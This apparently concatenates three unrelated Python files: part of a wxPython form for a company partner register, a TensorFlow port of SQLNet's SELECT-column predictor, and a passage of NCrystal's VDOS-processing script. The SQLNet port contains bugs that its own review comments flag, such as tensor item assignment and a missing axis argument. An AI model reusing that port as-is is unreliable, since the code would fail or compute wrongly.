        self.lb_soc_nome = wx.StaticText( self.pn_form_socios, wx.ID_ANY, u"Nome do Sócio:", wx.DefaultPosition, wx.Size( 150,26 ), wx.ALIGN_RIGHT )
        self.lb_soc_nome.Wrap( -1 )
        lay_label_soc1.Add( self.lb_soc_nome, 0, wx.ALL, 5 )
        self.lc_soc_federal = wx.StaticText( self.pn_form_socios, wx.ID_ANY, u"Cadastro Federal:", wx.DefaultPosition, wx.Size( 150,26 ), wx.ALIGN_RIGHT )
        self.lc_soc_federal.Wrap( -1 )
        lay_label_soc1.Add( self.lc_soc_federal, 0, wx.ALL, 5 )
        self.lb_soc_capital = wx.StaticText( self.pn_form_socios, wx.ID_ANY, u"Capital Integralizado:", wx.DefaultPosition, wx.Size( 150,26 ), wx.ALIGN_RIGHT )
        self.lb_soc_capital.Wrap( -1 )
        lay_label_soc1.Add( self.lb_soc_capital, 0, wx.ALL, 5 )
        self.lb_soc_quotas = wx.StaticText( self.pn_form_socios, wx.ID_ANY, u"Qtde. de Quotas:", wx.DefaultPosition, wx.Size( 150,26 ), wx.ALIGN_RIGHT )
        self.lb_soc_quotas.Wrap( -1 )
        lay_label_soc1.Add( self.lb_soc_quotas, 0, wx.ALL, 5 )
        self.lb_soc_vquota = wx.StaticText( self.pn_form_socios, wx.ID_ANY, u"Valor da Quota:", wx.DefaultPosition, wx.Size( 150,26 ), wx.ALIGN_RIGHT )
        self.lb_soc_vquota.Wrap( -1 )
        lay_label_soc1.Add( self.lb_soc_vquota, 0, wx.ALL, 5 )
        lay_form_soc.Add( lay_label_soc1, 0, wx.EXPAND, 5 )
        lay_text_soc1 = wx.BoxSizer( wx.VERTICAL )
        self.tc_soc_empresa = wx.TextCtrl( self.pn_form_socios, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.Size( 50,26 ), 0 )
        self.tc_soc_empresa.Enable( False )
        lay_text_soc1.Add( self.tc_soc_empresa, 0, wx.ALL, 5 )
        self.tc_soc_codigo = wx.TextCtrl( self.pn_form_socios, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.Size( 50,26 ), 0 )
        self.tc_soc_codigo.Enable( False )
        lay_text_soc1.Add( self.tc_soc_codigo, 0, wx.ALL, 5 )
        cb_soc_situacaoChoices = [ u"Ativo", u"Análise", u"Bloqueado", u"Saneamento", u"Cancelado" ]
        self.cb_soc_situacao = wx.ComboBox( self.pn_form_socios, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.Size( 150,26 ), cb_soc_situacaoChoices, 0 )
        self.cb_soc_situacao.Enable( False )
        lay_text_soc1.Add( self.cb_soc_situacao, 0, wx.ALL, 5 )
        self.tc_soc_nome = wx.TextCtrl( self.pn_form_socios, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.Size( 400,26 ), 0 )
        self.tc_soc_nome.Enable( False )
        lay_text_soc1.Add( self.tc_soc_nome, 0, wx.ALL, 5 )
        self.tc_soc_federal = wx.TextCtrl( self.pn_form_socios, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.Size( 200,26 ), 0 )
        self.tc_soc_federal.Enable( False )
        lay_text_soc1.Add( self.tc_soc_federal, 0, wx.ALL, 5 )
        self.tc_soc_capital = wx.TextCtrl( self.pn_form_socios, wx.ID_ANY, u"0.00", wx.DefaultPosition, wx.Size( 150,26 ), 0 )
        self.tc_soc_capital.Enable( False )
        lay_text_soc1.Add( self.tc_soc_capital, 0, wx.ALL, 5 )
        self.tc_soc_quotas = wx.TextCtrl( self.pn_form_socios, wx.ID_ANY, u"0.00", wx.DefaultPosition, wx.Size( 150,26 ), 0 )
        self.tc_soc_quotas.Enable( False )
        lay_text_soc1.Add( self.tc_soc_quotas, 0, wx.ALL, 5 )
        self.tc_soc_vquota = wx.TextCtrl( self.pn_form_socios, wx.ID_ANY, u"0.00", wx.DefaultPosition, wx.Size( 150,26 ), 0 )
        self.tc_soc_vquota.Enable( False )
        lay_text_soc1.Add( self.tc_soc_vquota, 0, wx.ALL, 5 )
        lay_form_soc.Add( lay_text_soc1, 1, wx.EXPAND, 5 )
        self.pn_form_socios.SetSizer( lay_form_soc )
        self.pn_form_socios.Layout()
        lay_form_soc.Fit( self.pn_form_socios )
        lay_socios.Add( self.pn_form_socios, 1, wx.EXPAND |wx.ALL, 5 )

        # Partner action buttons (all disabled until a record is loaded).
        lay_botao = wx.BoxSizer( wx.HORIZONTAL )
        self.bt_soc_consultar = wx.BitmapButton( self.pn_socios, wx.ID_ANY, wx.Bitmap( u"icons/ac_buscar_16x16.png", wx.BITMAP_TYPE_ANY ), wx.DefaultPosition, wx.DefaultSize, wx.BU_AUTODRAW )
        self.bt_soc_consultar.SetBitmapDisabled( wx.Bitmap( u"icons/ac_buscar_16x16_inat.png", wx.BITMAP_TYPE_ANY ) )
        self.bt_soc_consultar.Enable( False )
        lay_botao.Add( self.bt_soc_consultar, 0, wx.ALL, 5 )
        self.bt_soc_adicionar = wx.BitmapButton( self.pn_socios, wx.ID_ANY, wx.Bitmap( u"icons/ac_adicionar_16x16.png", wx.BITMAP_TYPE_ANY ), wx.DefaultPosition, wx.DefaultSize, wx.BU_AUTODRAW )
        self.bt_soc_adicionar.SetBitmapDisabled( wx.Bitmap( u"icons/ac_adicionar_16x16_inat.png", wx.BITMAP_TYPE_ANY ) )
        self.bt_soc_adicionar.SetDefault()
        self.bt_soc_adicionar.Enable( False )
        lay_botao.Add( self.bt_soc_adicionar, 0, wx.ALL, 5 )
        self.bt_soc_editar = wx.BitmapButton( self.pn_socios, wx.ID_ANY, wx.Bitmap( u"icons/ac_editar_16x16.png", wx.BITMAP_TYPE_ANY ), wx.DefaultPosition, wx.DefaultSize, wx.BU_BOTTOM )
        self.bt_soc_editar.SetBitmapDisabled( wx.Bitmap( u"icons/ac_editar_16x16_inat.png", wx.BITMAP_TYPE_ANY ) )
        self.bt_soc_editar.Enable( False )
        lay_botao.Add( self.bt_soc_editar, 0, wx.ALL, 5 )
        self.bt_soc_excluir = wx.BitmapButton( self.pn_socios, wx.ID_ANY, wx.Bitmap( u"icons/ac_lixeira_16x16.png", wx.BITMAP_TYPE_ANY ), wx.DefaultPosition, wx.DefaultSize, wx.BU_AUTODRAW )
        self.bt_soc_excluir.SetBitmapDisabled( wx.Bitmap( u"icons/ac_lixeira_16x16_inat.png", wx.BITMAP_TYPE_ANY ) )
        self.bt_soc_excluir.Enable( False )
        lay_botao.Add( self.bt_soc_excluir, 0, wx.ALL, 5 )
        self.bt_soc_confirmar = wx.BitmapButton( self.pn_socios, wx.ID_ANY, wx.Bitmap( u"icons/ac_confirmar_16x16.png", wx.BITMAP_TYPE_ANY ), wx.DefaultPosition, wx.DefaultSize, wx.BU_AUTODRAW )
        self.bt_soc_confirmar.SetBitmapDisabled( wx.Bitmap( u"icons/ac_confirmar_16x16_inat.png", wx.BITMAP_TYPE_ANY ) )
        self.bt_soc_confirmar.Enable( False )
        lay_botao.Add( self.bt_soc_confirmar, 0, wx.ALL, 5 )
        self.bt_soc_cancelar = wx.BitmapButton( self.pn_socios, wx.ID_ANY, wx.Bitmap( u"icons/ac_cancelar_16x16.png", wx.BITMAP_TYPE_ANY ), wx.DefaultPosition, wx.DefaultSize, wx.BU_AUTODRAW )
        self.bt_soc_cancelar.SetBitmapDisabled( wx.Bitmap( u"icons/ac_cancelar_16x16_inat.png", wx.BITMAP_TYPE_ANY ) )
        self.bt_soc_cancelar.Enable( False )
        lay_botao.Add( self.bt_soc_cancelar, 0, wx.ALL, 5 )
        lay_socios.Add( lay_botao, 0, wx.ALIGN_BOTTOM|wx.EXPAND, 5 )
        self.pn_socios.SetSizer( lay_socios )
        self.pn_socios.Layout()
        lay_socios.Fit( self.pn_socios )
        self.nb_dados.AddPage( self.pn_socios, u"Quadro Societário", False )
        lay_guias.Add( self.nb_dados, 1, wx.EXPAND |wx.ALL, 5 )
        lay_corpo.Add( lay_guias, 1, wx.EXPAND, 5 )

        self.SetSizer( lay_corpo )
        self.Layout()

        self.Centre( wx.BOTH )

        # Connect Events
        self.Bind( wx.EVT_TOOL, self.ac_buscar, id = self.bt_buscar.GetId() )
        self.Bind( wx.EVT_TOOL, self.ac_adicionar, id = self.bt_adicionar.GetId() )
        self.Bind( wx.EVT_TOOL, self.ac_editar, id = self.bt_editar.GetId() )
        self.Bind( wx.EVT_TOOL, self.ac_confirmar, id = self.bt_confirmar.GetId() )
        self.Bind( wx.EVT_TOOL, self.ac_cancelar, id = self.bt_cancelar.GetId() )
        self.Bind( wx.EVT_TOOL, self.ac_sair, id = self.bt_sair.GetId() )
        self.gd_socios.Bind( wx.EVT_LEFT_DCLICK, self.soc_consultar )
        self.bt_soc_consultar.Bind( wx.EVT_BUTTON, self.soc_consultar )
        self.bt_soc_adicionar.Bind( wx.EVT_BUTTON, self.soc_adicionar )
        self.bt_soc_editar.Bind( wx.EVT_BUTTON, self.soc_editar )
        self.bt_soc_excluir.Bind( wx.EVT_BUTTON, self.soc_excluir )
        self.bt_soc_confirmar.Bind( wx.EVT_BUTTON, self.soc_confirmar )
        self.bt_soc_cancelar.Bind( wx.EVT_BUTTON, self.soc_cancelar )

    def __del__( self ):
        pass

    # Virtual event handlers, overide them in your derived class
    def ac_buscar( self, event ):
        event.Skip()

    def ac_adicionar( self, event ):
        event.Skip()

    def ac_editar( self, event ):
        event.Skip()

    def ac_confirmar( self, event ):
        event.Skip()

    def ac_cancelar( self, event ):
        event.Skip()

    def ac_sair( self, event ):
        event.Skip()

    def soc_consultar( self, event ):
        event.Skip()

    def soc_adicionar( self, event ):
        event.Skip()

    def soc_editar( self, event ):
        event.Skip()

    def soc_excluir( self, event ):
        event.Skip()

    def soc_confirmar( self, event ):
        event.Skip()

    def soc_cancelar( self, event ):
        event.Skip()
|
import json
import numpy as np
from SQLNet.utils import run_lstm, col_name_encode
import tensorflow as tf
import tensorflow.keras.layers as layers
class SelPredictor(tf.keras.Model):
    """SQLNet SELECT-clause column predictor (TensorFlow/Keras port).

    Scores every table column for how likely it is to appear in the
    SELECT clause, optionally conditioning attention over the encoded
    question on each column ("column attention").
    """

    def __init__(self, N_word, N_h, N_depth, max_tok_num, use_ca):
        # N_h: hidden size; N_depth: number of stacked BiLSTM layers;
        # use_ca: enable column attention; N_word/max_tok_num kept for
        # API parity with the other SQLNet predictors.
        super(SelPredictor, self).__init__()
        self.use_ca = use_ca
        self.max_tok_num = max_tok_num
        # NOTE(review): ``N_h / 2`` is a float under Python 3, but Keras
        # LSTM expects integer units -- presumably ``N_h // 2`` was
        # intended (same below for sel_col_name_enc). Confirm.
        self.sel_lstm = tf.keras.Sequential([layers.Bidirectional(layers.LSTM(N_h / 2, dropout=.3,
                                                                              return_sequences=True)) for _ in range(
            N_depth)])
        if use_ca:
            print("Using column attention on selection predicting")
            self.sel_att = layers.Dense(N_h)
        else:
            print("Not usng column attention on selection predicting")
            self.sel_att = layers.Dense(1)
        self.sel_col_name_enc = tf.keras.Sequential([
            layers.Bidirectional(layers.LSTM(N_h / 2, dropout=.3, return_sequences=True)) for _ in range(N_depth)
        ])
        self.sel_out_K = layers.Dense(N_h)
        self.sel_out_col = layers.Dense(N_h)
        self.sel_out = tf.keras.Sequential([
            layers.Activation("tanh"),
            layers.Dense(1)
        ])
        self.softmax = layers.Softmax()

    def call(self, inputs, training=None, mask=None):
        """Return per-column selection scores.

        inputs: (x_emb_var, x_len, col_inp_var, col_name_len, col_len,
        col_num) -- question embeddings plus lengths, and column-name
        embeddings plus lengths, as produced by the SQLNet pipeline.
        """
        x_emb_var, x_len, col_inp_var, col_name_len, col_len, col_num = inputs
        B = len(x_emb_var)
        max_x_len = max(x_len)
        # Encode each column name into a single vector per column.
        e_col, _ = col_name_encode(col_inp_var, col_name_len, col_len, self.sel_col_name_enc)
        if self.use_ca:
            h_enc, _ = run_lstm(self.sel_lstm, x_emb_var, x_len)
            att_val = tf.matmul(e_col, self.sel_att(h_enc), transpose_b=True)
            # Mask attention over question padding tokens.
            # NOTE(review): item assignment on a tf.Tensor raises
            # TypeError -- this masking presumably only works if
            # att_val is a numpy array; consider tf.where. Confirm.
            for idx, num in enumerate(x_len):
                if num < max_x_len:
                    att_val[idx, :, num:] = -100
            att = tf.reshape(self.softmax(tf.reshape(att_val, (-1, max_x_len))), (B, -1, max_x_len))
            # Attention-weighted sum of question states, per column.
            K_sel_expand = tf.reduce_sum((tf.expand_dims(h_enc, axis=1) * tf.expand_dims(att, axis=3)), axis=2)
        else:
            h_enc, _ = run_lstm(self.sel_lstm, x_emb_var, x_len)
            att_val = tf.squeeze(self.sel_att(h_enc))
            for idx, num in enumerate(x_len):
                if num < max_x_len:
                    att_val[idx, num:] = -100
            att = self.softmax(att_val)
            # NOTE(review): tf.repeat is called without an axis and
            # tf.expand_dims(K_sel) lacks its required axis argument --
            # this branch looks broken/untested; compare against the
            # original PyTorch SQLNet implementation before relying on it.
            K_sel = tf.reduce_sum((h_enc * tf.repeat(tf.expand_dims(att, axis=2), h_enc.shape[-1])), axis=1)
            K_sel_expand = tf.expand_dims(K_sel)
        sel_score = tf.squeeze(self.sel_out(self.sel_out_K(K_sel_expand) + self.sel_out_col(e_col)))
        max_col_num = max(col_num)
        # Mask scores of padded (non-existent) columns.
        for idx, num in enumerate(col_num):
            if num < max_col_num:
                sel_score[idx, num:] = -100
        return sel_score
|
#!/usr/bin/env python3
################################################################################
## ##
## This file is part of NCrystal (see https://mctools.github.io/ncrystal/) ##
## ##
## Copyright 2015-2023 NCrystal developers ##
## ##
## Licensed under the Apache License, Version 2.0 (the "License"); ##
## you may not use this file except in compliance with the License. ##
## You may obtain a copy of the License at ##
## ##
## http://www.apache.org/licenses/LICENSE-2.0 ##
## ##
## Unless required by applicable law or agreed to in writing, software ##
## distributed under the License is distributed on an "AS IS" BASIS, ##
## WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. ##
## See the License for the specific language governing permissions and ##
## limitations under the License. ##
## ##
################################################################################
"""
Script which can read vdos curves from either .ncmat files or simple
two-column ascii text files (the two columns being energy grid and density) and
help users prepare output suitable for inclusion in .ncmat files
"""
################################################################################################
####### Common code for all NCrystal cmdline scripts needing to import NCrystal modules ########
# Refuse to run on unsupported Python versions before importing anything heavy.
import sys
pyversion = sys.version_info[0:3]
_minpyversion=(3,6,0)
if pyversion < _minpyversion:
    raise SystemExit('Unsupported python version %i.%i.%i detected (needs %i.%i.%i or later).'%(pyversion+_minpyversion))
# Keep both aliased and plain names available (shared boilerplate convention).
import os as _os
os = _os
import pathlib as _pathlib
pathlib = _pathlib
def maybeThisIsConda():
    """Best-effort detection of a conda environment.

    Returns the CONDA_PREFIX value when that variable is set and
    non-empty; otherwise a bool telling whether the interpreter's base
    prefix contains a conda-meta directory.
    """
    prefix = os.environ.get('CONDA_PREFIX', None)
    if prefix:
        return prefix
    return os.path.exists(os.path.join(sys.base_prefix, 'conda-meta'))
def fixSysPathAndImportNCrystal( *, allowfail = False ):
    """Locate and import the NCrystal python module.

    For CMake-based installations, a marker inside the adjacent
    ncrystal-config script points at the module location, which is then
    prepended to sys.path.  Returns the imported module, or None when
    allowfail is True and the import fails.
    """
    thisdir = pathlib.Path( __file__ ).parent
    def extract_cmake_pymodloc():
        # Look for a '#CMAKE_RELPATH_TO_PYMOD:' marker within the first
        # 30 lines of the co-installed ncrystal-config script.
        p = thisdir / 'ncrystal-config'
        if not p.exists():
            return
        with p.open('rt') as fh:
            for i,l in enumerate(fh):
                if i==30:
                    break
                if l.startswith('#CMAKE_RELPATH_TO_PYMOD:'):
                    l = l[24:].strip()
                    return ( thisdir / l ) if l else None
    pml = extract_cmake_pymodloc()
    hack_syspath = pml and ( pml / 'NCrystal' / '__init__.py' ).exists()
    if hack_syspath:
        # Prepend so the co-installed module wins over any system copy.
        sys.path.insert(0,str(pml.absolute().resolve()))
    try:
        import NCrystal
    except ImportError as e:
        if allowfail:
            return
        msg = 'ERROR: Could not import the NCrystal Python module (reason: "%s")'%e
        if maybeThisIsConda():
            msg += ' (if using conda it might help to close your terminal and activate your environment again)'
        elif not hack_syspath:
            msg += ' (perhaps your PYTHONPATH is misconfigured)'
        raise SystemExit(msg)
    return NCrystal
def ncImportSubModule( mainmodule, submodulename ):
    """Import and return the named submodule of *mainmodule*."""
    qualified = '%s.%s' % (mainmodule.__name__, submodulename)
    toplevel = __import__(qualified)
    return getattr(toplevel, submodulename)
################################################################################################
# Actually import NCrystal plus the submodules this script needs.
NC = fixSysPathAndImportNCrystal()
nc_constants = ncImportSubModule( NC, 'constants' )
nc_vdos = ncImportSubModule( NC, 'vdos' )
import numpy as np
import argparse
# Map of supported energy/frequency unit names to their value in eV,
# plus a pre-formatted list of the valid unit names for error messages.
units_2_fact = nc_vdos.vdos_units_2_eV
units_opts = ', '.join(sorted(units_2_fact.keys()))
def decodeFileName(filename):
    """Split an input spec "PATH[@@SELECT]" into its components.

    Returns a dict with keys 'path', 'select' (None when absent),
    'basename' and a human-readable 'title' (a digit selection is shown
    as "column #N in <basename>").
    """
    path, sep, select = filename.partition('@@')
    if not sep:
        select = None
    bn = os.path.basename(path)
    if select:
        what = 'column #%s' % select if select.isdigit() else select
        title = '%s in %s' % (what, bn)
    else:
        title = bn
    return {'path': path, 'select': select, 'basename': bn, 'title': title}
def getVDOSFromFile(fn):
    """Load a VDOS curve, dispatching on the file extension.

    .ncmat files go through NCrystal; anything else is parsed as a
    two-column ascii text file.
    """
    if decodeFileName(fn)['basename'].endswith('.ncmat'):
        return getVDOSFromNCMAT(fn)
    return getVDOSFromTXT(fn)
def getVDOSFromTXT(fn):
    """Load a VDOS curve from a multi-column ascii text file.

    The file must contain a comment line like "#unit:THz" naming the
    unit of the first (energy/frequency) column.  An optional "@@N"
    selection picks column N as the density column.  Returns a tuple
    (egrid_in_eV, density) with density normalised so its maximum is 1.
    """
    fn = decodeFileName(fn)
    select=None
    if fn['select']:
        # For text files the selection must be a column number (>0).
        assert fn['select'].isdigit(),"selection must be column number"
        select = int(fn['select'])
    #figure out unit:
    unit=None
    for l in open(fn['path']):
        if l.startswith('#') and 'unit' in l:
            _=l.split('#',1)[1].split(':',1)
            if not len(_)==2:
                continue
            unit=_[1].strip()
            if not unit in units_2_fact.keys():
                raise SystemExit(f'Unknown unit "{unit}" specified in {fn["path"]}. Valid choices are: {units_opts}')
            break
    if not unit:
        raise SystemExit(f'Missing energy/frequency unit in {fn["path"]}. Please put initial line with content like "#unit:THz". Valid units are: {units_opts}')
    usecols=None
    if select is not None:
        assert select>0
        usecols=(0,select)
    _ = np.genfromtxt(fn['path'],dtype=[('egrid','f8'),('density','f8')],usecols=usecols)
    egrid=_['egrid'].copy()
    density=_['density'].copy()
    # Normalise the density curve to a maximum of unity.
    density /= density.max()
    return egrid.copy()*units_2_fact[unit],density.copy()
def getVDOSFromNCMAT(fn):
    """Extract a VDOS curve from an .ncmat file via NCrystal.

    Honours an optional "@@<element>" selection for files with more
    than one VDOS.  Returns (egrid_in_eV, density) with density
    normalised so its maximum is 1.
    """
    fnd = decodeFileName(fn)
    info = NC.createInfo(fnd['path'])
    select = fnd['select']
    di_vdos = [di for di in info.dyninfos if isinstance(di,NC.Info.DI_VDOS)]
    if not select is None:
        # Keep only the dyninfo whose display label matches the selection.
        l=[]
        for di in di_vdos:
            dl=di.atomData.displayLabel()
            if dl!=select:
                print(f"NB: Ignoring (due to selection) VDOS for element {dl} in file {fn}.")
            else:
                l+=[di]
        if not l:
            raise SystemExit(f'ERROR: Could not find VDOS in file {fn} for selected element: {select}')
        if not len(l)==1:
            raise SystemExit(f'ERROR: Multiple VDOS entries in file {fn} for selected element: {select} (which is rather odd!)')
        di_vdos = l
    if len(di_vdos)>1:
        s=' '.join(di.atomData.displayLabel() for di in di_vdos)
        raise SystemExit(f"ERROR: Multiple VDOS entries found in file {fn}. Please select one of them (by putting \"@@<element>\" after the file-name): {s}")
    elif not di_vdos:
        raise SystemExit(f"ERROR: No vdos found in file {fn}")
    eg,ds = di_vdos[0].vdosOrigEgrid(),di_vdos[0].vdosOrigDensity()
    ds /= ds.max()
    # A two-point egrid denotes (emin, emax) of a regular grid; expand it
    # to one point per density value.
    if len(eg)==2:
        eg = np.linspace(eg[0],eg[1],len(ds))
    return eg.copy(),ds.copy()
def parseArgs():
    """Parse and validate command line arguments; return the namespace.

    Besides argparse parsing this also normalises --ref (flattens the
    nested lists), --dpi (env-var / default handling plus sanity caps)
    and --debye (converted from kelvin or an energy unit to eV).
    """
    descr="""
Script which can read vdos curves from either .ncmat files or simple two-column
ascii text files (the two columns being energy grid and density) and help users
prepare output suitable for inclusion in .ncmat files. When the input is not an
.ncmat file, the user must specify the energy grid units by adding a line in the file
like for instance "#unit:THz" or "#unit:meV".

In case of NCMAT files with more than one VDOS, just post-fix the filename with
the element to investigate, separated by '@@', e.g. "Al2O3.ncmat@@O". In case of
.txt files with more than 2 columns, select the column representing the VDOS
density in the same manner, e.g. "Al2O3.txt@2" (the first column is always the
energy or frequency).

Thus it is possible to plot the curve, compare against vdos curves from other
.ncmat files, apply low-E truncation (cutoff), regularise binning, and overlay
with an ideal Debye spectrum for a given Debye energy or Debye
temperature. Finally, when running without --plot, it will output the resulting
spectrum into format which is ready for inclusion in .ncmat files.
"""
    parser = argparse.ArgumentParser(description=descr)
    parser.add_argument("FILE",help="Either .ncmat file with VDOS or a text file with two colums of data: egrid and density.")
    parser.add_argument('--plot','-p', action='store_true',help='Plot extracted spectrum')
    parser.add_argument("--cutoff",'-c',nargs='+',default=None,type=float,
                        help="""Emin cutoff points in eV (more than one can be provided for simultaneous
                        inspection with --plot).""")
    parser.add_argument("--unit",'-u',default='meV',type=str,
                        help=f"Visualisation unit (ignored unless --plot is supplied). Defaults to meV. Possible options are {units_opts}.")
    parser.add_argument("--ref",'-r',nargs='+',
                        action='append',type=str,
                        help="""Optionally provide list of .ncmat files with
                        vdos data, to superimpose on plots.""")
    parser.add_argument("--forceregular",'-f',type=int,nargs='?',default=0,
                        help="""Optionally provide this argument to
                        reparameterise with that amount of linearly spaced
                        points in [emin,emax+epsilon], where epsilon is chosen
                        so the grid can be extended to 0 with a whole number of
                        bins. This format will be directly used by NCrystal
                        without on-the-fly reparameterisation upon loading.""")
    parser.add_argument("--debye",'-d',nargs='?',default='',type=str,
                        help="""Set to debye temperature (unit K) or egrid point
                        (units like meV, eV, THz, ...) in order to plot Debye
                        spectrum with that parameter on top.""")
    parser.add_argument('--g1',default=0.0,type=float,
                        help="""Use with --plot to show Sjolander's G1 function at the indicated temperature
                        (in kelvin) instead of the DOS directly. This is the Symmetric G1 fct without a
                        detailed balance factor, and it will be plotted assuming gamma0=1.0.""")
    parser.add_argument('--stdout',action='store_true',help="""Produce no output file but
                        print vdos_egrid and vdos_density lines to stdout (for scripting)""")
    dpi_default=200
    parser.add_argument('--dpi', default=-1,type=int,
                        help="""Change plot resolution. Set to 0 to leave matplotlib defaults alone.
                        (default value is %i, or whatever the NCRYSTAL_DPI env var is set to)."""%dpi_default)
    args=parser.parse_args()
    # --forceregular with no value at all (nargs='?') yields None.
    if args.forceregular is None:
        parser.error('Missing argument (number of points) to --forceregular.')
    if args.dpi>3000:
        parser.error('Too high DPI value requested.')
    # -1 means "not given on the command line": fall back to the
    # NCRYSTAL_DPI environment variable, then to the hardcoded default.
    if args.dpi==-1:
        _=os.environ.get('NCRYSTAL_DPI',None)
        if _:
            try:
                _=int(_)
                if _<0:
                    raise ValueError
            except ValueError:
                print("ERROR: NCRYSTAL_DPI environment variable must be set to integer >=0")
                raise SystemExit
            if _>3000:
                parser.error('Too high DPI value requested via NCRYSTAL_DPI environment variable.')
            args.dpi=_
        else:
            args.dpi=dpi_default
    # With action='append' + nargs='+', --ref is a list of lists; flatten it.
    if args.ref:
        args.ref = [item for sublist in args.ref for item in sublist]
    if args.ref and not args.plot:
        parser.error(f'Option --ref requires --plot')
    if args.unit and not args.unit in units_2_fact:
        parser.error(f'Unknown unit {args.unit}. Valid options are {units_opts}')
    if args.debye and not args.plot:
        parser.error(f'Option --debye requires --plot')
    if args.stdout and args.plot:
        parser.error(f'Option --stdout can not be used with --plot')
    if args.cutoff and len(args.cutoff)>1 and not args.plot:
        parser.error(f'Option --cutoff can only have one argument when not using --plot')
    if args.cutoff and len(args.cutoff)>1 and args.forceregular:
        parser.error(f'Option --cutoff can only have one argument when using --forceregular')
    # Normalise --debye to an energy in eV (from kelvin or an energy unit).
    if args.debye:
        if args.debye.endswith('K'):
            args.debye = float(args.debye[0:-1])*nc_constants.constant_boltzmann
        else:
            #find (longest, so "meV" does not trigger "eV") fitting unit:
            l=[ (len(u),u) for u in units_2_fact.keys() if args.debye.endswith(u) ]
            l.sort()
            if not l:
                parser.error("Option --debye requires unit (see --help)")
            unit = l[-1][1]
            args.debye = units_2_fact[unit] * float(args.debye[0:-len(unit)])
    return args
# Parse the command line, load the VDOS curve from file, and validate the egrid.
args=parseArgs()
file_decoded = decodeFileName(args.FILE)
args_file_basename=file_decoded['basename']
egrid,density = getVDOSFromFile(args.FILE)
assert len(egrid) == len(density)
print (f"Loaded VDOS with {len(density)} grid points from {args_file_basename}")
# Helpers checking that the energy grid is (strictly) ascending.
numpy_is_sorted = lambda a: np.all(a[:-1] <= a[1:])
numpy_is_strongly_sorted = lambda a: np.all(a[:-1] < a[1:])
if not numpy_is_strongly_sorted(egrid):
    # Report every offending neighbouring pair before aborting.
    for i in range(len(egrid)-1):
        if not egrid[i] < egrid[i+1]:
            print("Problems detected in egrid points with values ",egrid[i],"and",egrid[i+1])
    raise SystemExit('ERROR: egrid values (first column) of input file are not in sorted'
                     +' (ascending) order, or there are identical elements.')
cutoffs=[]
if args.cutoff:
    # Map each requested cutoff energy to the first grid point at or above it.
    for c in args.cutoff:
        if c >= egrid[-1]:
            raise SystemExit(f'ERROR: Cutoff value {c} is higher than highest point in egrid')
        i=np.searchsorted(egrid,c)
        assert i==0 or egrid[i-1]<c
        assert egrid[i]>=c
        cutoffs+=[ (i, egrid[i] ) ]
        print(f" => Mapping cutoff value of {c} to grid point at {cutoffs[-1][1]}")
def applyCutoff(egrid, density, cutoffs):
    """Trim egrid/density below the single configured cutoff grid point.

    ``cutoffs`` is either empty or a one-element list of ``(index, value)``
    pairs; when present, both arrays are returned from that index onwards,
    otherwise they are returned unchanged.
    """
    if not cutoffs:
        return egrid, density
    assert len(cutoffs) == 1
    start_idx = cutoffs[0][0]
    return egrid[start_idx:], density[start_idx:]
# --forceregular (and any non-plot output) requires the grid to start above
# 1e-5 eV; otherwise ask the user to trim the spectrum with --cutoff first.
if args.forceregular or (not args.plot):
    if applyCutoff(egrid,density,cutoffs)[0][0]<=1e-5:
        raise SystemExit(f"""
ERROR: The first value in the loaded egrid is {egrid[0]} which is less than 1e-5eV.
This is not allowed when using --forceregular or when not using --plot.
Please use the --cutoff parameter to remove lowest part of input spectrum (perhaps
after investigating the cutoff value with --plot).
""")
def regularise(egrid,density,n):
    """Resample (egrid,density) onto a regular grid of >= n points.

    The chosen bin width divides egrid[0] exactly (so the grid extrapolates
    regularly down to 0), and the density is linearly interpolated onto the
    new grid with 0.0 outside the original range.
    """
    #first step back from any zeroes at the upper end:
    i=1
    while i < len(density) and density[-i]==0.0:
        i += 1
    safepeel = i-2
    if safepeel>=1:
        print (f"Ignoring {safepeel} last points while regularising since last {safepeel+1} points are 0.")
        egrid,density = egrid[0:-(safepeel)],density[0:-(safepeel)]
    emin,emax=egrid[0],egrid[-1]
    print('old range',emin,emax)
    THZ = nc_constants.constant_planck*1e12
    print('old range [THZ]',emin/THZ,emax/THZ)
    for k in range(1,1000000000):
        #k is number of bins below emin, an integral number by definition in a regularised grid.
        binwidth = emin/k
        nbins=int(np.floor((emax-emin)/binwidth))+1
        eps = (emin+nbins*binwidth)-emax
        assert eps>=0.0
        if nbins+1 >= n:
            break
    # k is now the smallest bin count below emin giving at least n points.
    n=nbins+1
    binwidth = emin/k
    new_emax = emin + (n-1) * binwidth
    # Drop the extra point if the previous one already coincides with emax.
    if abs( (new_emax-binwidth) - emax ) < 1e-3*binwidth:
        nbins -= 1
        n -= 1
        new_emax -= binwidth
    print (f" ==> Choosing regular grid with n={n} pts from emin={emin} to emax={new_emax} ({new_emax-emax} beyond old emax)")
    assert new_emax >= emax-binwidth*1.001e-3
    new_egrid = np.linspace(emin,new_emax,n)
    # Sanity check: the first grid point must be an integral number of bins.
    test=new_egrid[0] / ( (new_egrid[-1]-new_egrid[0])/(len(new_egrid)-1) )
    assert abs(round(test)-test)<1e-6,f'{test}'
    new_density = np.interp(new_egrid,egrid,density, left=0.0, right=0.0)
    print(f'last density values in new grid: ',new_density[-5:])
    return new_egrid,new_density
if args.forceregular:
    regularised_egrid,regularised_density = regularise(*applyCutoff(egrid,density,cutoffs),args.forceregular)
if args.plot:
    vis_unit=args.unit
    vis_unit_fact = 1.0 / units_2_fact[vis_unit]
    def plt_plot(egrid,dos,*aargs,**kwargs):
        # Plot either the DOS directly, or (with --g1) Sjolander's symmetric
        # G1 function derived from it at temperature args.g1, with gamma0=1.
        if args.g1 and args.g1 > 0.0:
            #G1 = f(E)/(E*2*gamma0*sinh(E/2kT)) [symmetric G1 that is]
            #u = E/2kT
            #asymmetric means another factor of exp(-u).
            #And exp(-u)/2sinh(u) = exp(-u) / (exp(u)-exp(-u) ) = 1 / ( exp(2u)-1)
            #And exp(+u)/2sinh(u) = exp(+u) / (exp(u)-exp(-u) ) = 1 / ( 1-exp(-2u) )
            #
            #So with gamma0=0 we get:
            egrid_eV = egrid.copy() / vis_unit_fact
            T = args.g1
            gamma0 = 1.0
            two_u = egrid_eV / ( nc_constants.constant_boltzmann * T )
            #g1asym_neg = dos / ( egrid_eV * -np.expm1(-two_u) )
